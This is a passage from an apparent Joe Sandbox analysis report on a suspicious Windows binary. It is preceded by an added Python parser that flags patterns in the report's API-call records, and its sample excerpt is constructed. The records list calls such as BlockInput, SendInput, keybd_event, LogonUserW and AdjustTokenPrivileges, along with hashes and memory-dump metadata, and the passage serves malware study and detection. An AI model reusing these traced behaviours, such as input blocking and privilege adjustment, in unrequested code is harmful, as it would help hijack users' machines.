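Added example, not Joe Sandbox's code: a small Python parser for the function records in this section that turns the bullet lines (Name.MODULE(args), ref: address; API ID; API String ID; Instruction Fuzzy Hash) into structured data and flags the argument patterns visible above. It decodes the DeviceIoControl control code 0x002D1400 as IOCTL_STORAGE_QUERY_PROPERTY (device type 0x2D FILE_DEVICE_MASS_STORAGE, function 0x500, METHOD_BUFFERED; the 0xC input and 0x28 output sizes match STORAGE_PROPERTY_QUERY and STORAGE_DEVICE_DESCRIPTOR), recognises the AllocateAndInitializeSid / CheckTokenMembership pair with sub-authorities 0x20 and 0x220 as a BUILTIN\Administrators (S-1-5-32-544) membership check, notes AdjustTokenPrivileges and InternetReadFile, and records the symbol resolved through GetProcAddress. The embedded SAMPLE text is a constructed three-record excerpt in the report's layout; the flag names are this example's own convention, not a Joe Sandbox signature.

```python
# Parser for Joe Sandbox function-record text (added example, not Joe Sandbox code).
import re
from dataclasses import dataclass, field

# Constructed excerpt: three records from this section trimmed to the bullet
# lines the parser uses, in the report's own layout.
SAMPLE = """\
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 003F7223
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003F723A
• FreeSid.ADVAPI32(?), ref: 003F724A
• API ID: AllocateCheckFreeInitializeMembershipToken
• API String ID: 3429775523-0
• Instruction Fuzzy Hash: D6F01275D14209BFDF04DFF4DD89AEDBBB8EF08605F105469A602E2191E27056448B14
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003F6623
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003F6664
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003F666F
• API ID: CloseControlCreateDeviceFileHandle
• API String ID: 33631002-0
• Instruction Fuzzy Hash: A5111E71E01228BFDB118FA5EC45BBEBBBCEB45B10F104166F900E7290D7B05E059BA5
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,003CE014,75570AE0,003CDEF1,0044DC38,?,?), ref: 003CE02C
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003CE03E
• API ID: AddressLibraryLoadProc
• API String ID: 2574300362-192647395
• Instruction Fuzzy Hash: 32D0A731800B22AFCB324F61FD08B1276D4AB00301F29443FE481D2150E7F8CC808B94
"""

# "• Name.MODULE(args), ref: addr", "• Name.MODULE ref: addr", and the indented
# "• Part of subcall function XXXX: Name.MODULE(...), ref: addr" variant.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\S+?)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list          # int for hex literals, str for names, None for '?' (unresolved)
    ref: str
    subcall: str = ""   # caller address when listed as "Part of subcall function"

@dataclass
class Record:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # API ID, API String ID, fuzzy hashes ...

def _arg(tok):
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok   # string literal such as kernel32.dll or GetNativeSystemInfo

def parse_records(text):
    """Split report text into Records; the Instruction Fuzzy Hash line closes a record."""
    records, cur = [], Record()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
            cur.calls.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"] or ""))
            continue
        f = FIELD_RE.match(line)
        if f:
            cur.fields[f["key"]] = f["val"]
            if f["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = Record()
    if cur.calls or cur.fields:
        records.append(cur)   # record cut off before its hash line (as at the end of this page)
    return records

def decode_ctl_code(code):
    """Unpack a Windows CTL_CODE: DeviceType<<16 | Access<<14 | Function<<2 | Method."""
    return {"device_type": (code >> 16) & 0xFFFF, "access": (code >> 14) & 0x3,
            "function": (code >> 2) & 0xFFF, "method": code & 0x3}

# FILE_DEVICE_MASS_STORAGE (0x2D), function 0x500, METHOD_BUFFERED -> 0x002D1400
KNOWN_IOCTLS = {(0x2D, 0x500): "IOCTL_STORAGE_QUERY_PROPERTY"}

def flag_record(rec):
    """Flags (this example's own names) for the argument patterns seen in these records."""
    flags, by_name = [], {c.name: c for c in rec.calls}
    gpa = by_name.get("GetProcAddress")
    if gpa and len(gpa.args) > 1 and isinstance(gpa.args[1], str):
        flags.append(f"dynamic-resolve:{gpa.args[1]}")
    if "AdjustTokenPrivileges" in by_name:
        flags.append("privilege-adjust")
    sid = by_name.get("AllocateAndInitializeSid")
    # Two sub-authorities 0x20 (SECURITY_BUILTIN_DOMAIN_RID) and 0x220 (DOMAIN_ALIAS_RID_ADMINS)
    # under S-1-5 give S-1-5-32-544, BUILTIN\Administrators: the classic "am I admin?" check.
    if sid and "CheckTokenMembership" in by_name and sid.args[1:4] == [2, 0x20, 0x220]:
        flags.append("admin-check:S-1-5-32-544")
    dic = by_name.get("DeviceIoControl")
    if dic and len(dic.args) > 1 and isinstance(dic.args[1], int):
        d = decode_ctl_code(dic.args[1])
        flags.append("ioctl:" + KNOWN_IOCTLS.get((d["device_type"], d["function"]), f"0x{dic.args[1]:08X}"))
    if "InternetReadFile" in by_name:
        flags.append("wininet-download")
    return flags

def analyze(text):
    """Map each flagged record's API String ID to its flags."""
    out = {}
    for rec in parse_records(text):
        fl = flag_record(rec)
        if fl:
            out[rec.fields.get("API String ID", "?")] = fl
    return out
```

Paste the text of this section into a file and call analyze() on it; the Memory Dump Source and Snapshot File bullets are kept as ordinary fields, indented "Part of subcall function" calls carry their caller address in subcall, and an unknown control code is reported as its raw hex so it can be looked up by hand.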
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 003FF599
                                                                                • FindClose.KERNEL32(00000000), ref: 003FF5C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: e334d4250967367ba91818f54c24f477ceeae832be7e7aaeb6d411ae26634847
                                                                                • Instruction ID: 36dfe0e8c7e59a302a9c8d43d0264d1dc9eb38e0fa3b1ff29285817bf4f4dae7
                                                                                • Opcode Fuzzy Hash: e334d4250967367ba91818f54c24f477ceeae832be7e7aaeb6d411ae26634847
                                                                                • Instruction Fuzzy Hash: DC11A1316042049FDB01EF28D845A2EB3E8FF85324F00892EF9A9DB291CB30AD008B85
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0040BE6A,?,?,00000000,?), ref: 003FCEA7
                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0040BE6A,?,?,00000000,?), ref: 003FCEB9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                • Opcode ID: d106099322b7a290727881e07836f43ad41732b704dbc96004fbefdb2175957b
                                                                                • Instruction ID: 1546e4591f7bcab7bd29c769e297c1b39b451aa9ca219ecc8bd1118544fccf12
                                                                                • Opcode Fuzzy Hash: d106099322b7a290727881e07836f43ad41732b704dbc96004fbefdb2175957b
                                                                                • Instruction Fuzzy Hash: 41F0823151022DEBDB21ABA4DC49FFA776DBF08351F004165F915D6181D630DA50CBA1
                                                                                APIs
                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 003F4153
                                                                                • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 003F4166
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: InputSendkeybd_event
                                                                                • String ID:
                                                                                • API String ID: 3536248340-0
                                                                                • Opcode ID: c0ab556b7fddca0cf0e1f43ab13ee138a032f2beff640308fbae8c4fa3e19267
                                                                                • Instruction ID: 516fd719b9760f8e6c7731a7ec411d88c8f88ad7838725d8b9463422587d9524
                                                                                • Opcode Fuzzy Hash: c0ab556b7fddca0cf0e1f43ab13ee138a032f2beff640308fbae8c4fa3e19267
                                                                                • Instruction Fuzzy Hash: 03F0677080024DAFDB068FA0C805BBEBBB4EF00305F00801AF966A6292D77986129FA4
                                                                                APIs
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003EACC0), ref: 003EAB99
                                                                                • CloseHandle.KERNEL32(?,?,003EACC0), ref: 003EABAB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                • String ID:
                                                                                • API String ID: 81990902-0
                                                                                • Opcode ID: eeaba61b19fd2ad43865beba0ea1cfa71e4ce4380d1305a5b28df6c201529216
                                                                                • Instruction ID: e14dce1ff643a3e62eb839b4e5fa04a4b7a0a798ddfb1e69446e8137a08d0278
                                                                                • Opcode Fuzzy Hash: eeaba61b19fd2ad43865beba0ea1cfa71e4ce4380d1305a5b28df6c201529216
                                                                                • Instruction Fuzzy Hash: 18E0E671004511AFE7262F55FC05DB77BEAEF04320B10853DF95AC5470D7626C90DB50
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,003D6DB3,-0000031A,?,?,00000001), ref: 003D81B1
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003D81BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: cedd5cbefb4bd6fdc607f3cfad6db251116cdaef6fa9865e1f998fab9c8bddb4
                                                                                • Instruction ID: 69f2ab83ca2b83eb4b2a1c6c07e4659e89f5d046bd23ba2d16fa326588fbba1a
                                                                                • Opcode Fuzzy Hash: cedd5cbefb4bd6fdc607f3cfad6db251116cdaef6fa9865e1f998fab9c8bddb4
                                                                                • Instruction Fuzzy Hash: EFB09231444608ABDB002BA1FC09B987F68EB08652F005030FA0D450618B7258208A9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: G
                                                                                • API String ID: 3964851224-2567791629
                                                                                • Opcode ID: d2f620db457f9e7c6d43193cd5a86868b3f89b75f0baa166f4f3e0c4c94f946e
                                                                                • Instruction ID: 15e4b34fbe695f7510104a4e923728e58931ea34b3f2e6f23ecbc4f0a44f228c
                                                                                • Opcode Fuzzy Hash: d2f620db457f9e7c6d43193cd5a86868b3f89b75f0baa166f4f3e0c4c94f946e
                                                                                • Instruction Fuzzy Hash: FE9279706083419FD726DF18C480F6ABBE5BF88308F14885EE98A8B762D775ED45CB52
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5916b6ec152937a18d1f6561c683e7750130d367010cbda37654dfa55229b933
                                                                                • Instruction ID: 73f2c0f402afaf0264b1c6cfd438a526fdff604ce337ee16870a4698b13ac586
                                                                                • Opcode Fuzzy Hash: 5916b6ec152937a18d1f6561c683e7750130d367010cbda37654dfa55229b933
                                                                                • Instruction Fuzzy Hash: CD322422D69F014DD7239634E922336A298AFB73C4F55D737F819B5EAAEB29C4834104
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 674341424-0
                                                                                • Opcode ID: 772d732c77822b94d41795fc8b5b92871791b920be8bdfd96123e013eaf569ea
                                                                                • Instruction ID: d064d8fadf099ba3d2db1e7ff894c28d1452ab0b3a59266ed653a297809a8b6c
                                                                                • Opcode Fuzzy Hash: 772d732c77822b94d41795fc8b5b92871791b920be8bdfd96123e013eaf569ea
                                                                                • Instruction Fuzzy Hash: 6D22BD716083119FD726DF14C891BAFB7E4AF84308F10491EFA9A8B691DB75ED44CB82
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b9158f3ac1e9d173dfc2dcb69fa3e6b0369e29b6654e645eb8f4907bf95e6ca8
                                                                                • Instruction ID: 61518d506b891588433e20ade3d44f34268803dfaf1df3cfbe88cc555f02010d
                                                                                • Opcode Fuzzy Hash: b9158f3ac1e9d173dfc2dcb69fa3e6b0369e29b6654e645eb8f4907bf95e6ca8
                                                                                • Instruction Fuzzy Hash: ECB1F128D2AF514ED72397398831336B65CAFBB2D5F91D72BFC1A74D62EB2185834180
                                                                                APIs
                                                                                • __time64.LIBCMT ref: 003FB6DF
                                                                                  • Part of subcall function 003D344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003FBDC3,00000000,?,?,?,?,003FBF70,00000000,?), ref: 003D3453
                                                                                  • Part of subcall function 003D344A: __aulldiv.LIBCMT ref: 003D3473
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                • String ID:
                                                                                • API String ID: 2893107130-0
                                                                                • Opcode ID: 82c65d79e67b24f73d441f8a80f2fae1f62fc87e6c1fae1b0ecac0348e624905
                                                                                • Instruction ID: 009a69bb2ee54ac68744a7a500287614e1cc298f84a1084ebda772e3212f565c
                                                                                • Opcode Fuzzy Hash: 82c65d79e67b24f73d441f8a80f2fae1f62fc87e6c1fae1b0ecac0348e624905
                                                                                • Instruction Fuzzy Hash: 3C2163726345108BC72ACF28D481A52F7E1EB95311B248E7DE4E5CF280CB74A945DB54
                                                                                APIs
                                                                                • BlockInput.USER32(00000001), ref: 00406ACA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BlockInput
                                                                                • String ID:
                                                                                • API String ID: 3456056419-0
                                                                                • Opcode ID: a076d804c551d692255aa01bb743747a4ce444addb01f1987392ae75e3c63981
                                                                                • Instruction ID: 9087ee8c52a1a59d4cef463ea978d7a7c881bb809dcc08f5dea9c08281302544
                                                                                • Opcode Fuzzy Hash: a076d804c551d692255aa01bb743747a4ce444addb01f1987392ae75e3c63981
                                                                                • Instruction Fuzzy Hash: DEE012353102046FC700EB69D405D96B7ECAFA5761B05C426E946DB291DAB4F8048B90
                                                                                APIs
                                                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003F74DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: mouse_event
                                                                                • String ID:
                                                                                • API String ID: 2434400541-0
                                                                                • Opcode ID: 87af0530ebf188b2bb5f77aa054c8e9b901fbf55bb2213f9e6366d10f2b0eb8e
                                                                                • Instruction ID: 41968caaee5f5651769476d6bbcebe1ee7d4f0fe865a13d37d8466b4800aa3d4
                                                                                • Opcode Fuzzy Hash: 87af0530ebf188b2bb5f77aa054c8e9b901fbf55bb2213f9e6366d10f2b0eb8e
                                                                                • Instruction Fuzzy Hash: CAD05EA1A2C30D38EC2B07269C0FF760909F3007C0F829189B382C94C1F88058019032
                                                                                APIs
                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003EAD3E), ref: 003EB124
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: LogonUser
                                                                                • String ID:
                                                                                • API String ID: 1244722697-0
                                                                                • Opcode ID: b5d1bcd6a73a8651d1d5dbf4f22c04e0855f95587316deac96eb211caeeec3dc
                                                                                • Instruction ID: f11088939f19f6b203382c902f9ee53db45a0b50bf3e4ecf288be4629d3fea0e
                                                                                • Opcode Fuzzy Hash: b5d1bcd6a73a8651d1d5dbf4f22c04e0855f95587316deac96eb211caeeec3dc
                                                                                • Instruction Fuzzy Hash: 6BD05E320A460EAEEF024FA4EC02EAE3F6AEB04B00F408110FA11D50A0C771D531AB50
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID:
                                                                                • API String ID: 2645101109-0
                                                                                • Opcode ID: 2f99750264d5c82ea9135e2287b19a558ab66b57b885e915ff79179257fa5aed
                                                                                • Instruction ID: 5bbca8e797d559c815518163ebd5dbb058411289e3e65e95dbced15f7443ba05
                                                                                • Opcode Fuzzy Hash: 2f99750264d5c82ea9135e2287b19a558ab66b57b885e915ff79179257fa5aed
                                                                                • Instruction Fuzzy Hash: BCC04CB1800119DFC755DFC0D9449EEB7BCAB08705F105092A105F2110D7749B459B76
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 003D818F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: da3538e1f34e28049255b6ddf318fb2bd60eaef1784ca25404bb13595d4064ea
                                                                                • Instruction ID: b10e7b4f29c81a67395139566b21c5a8fcf026447e74f25d36c92ae0f8aad260
                                                                                • Opcode Fuzzy Hash: da3538e1f34e28049255b6ddf318fb2bd60eaef1784ca25404bb13595d4064ea
                                                                                • Instruction Fuzzy Hash: B3A0113000020CAB8F002B82FC088883F2CEB002A0B000030F80C000208B22A8208A8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
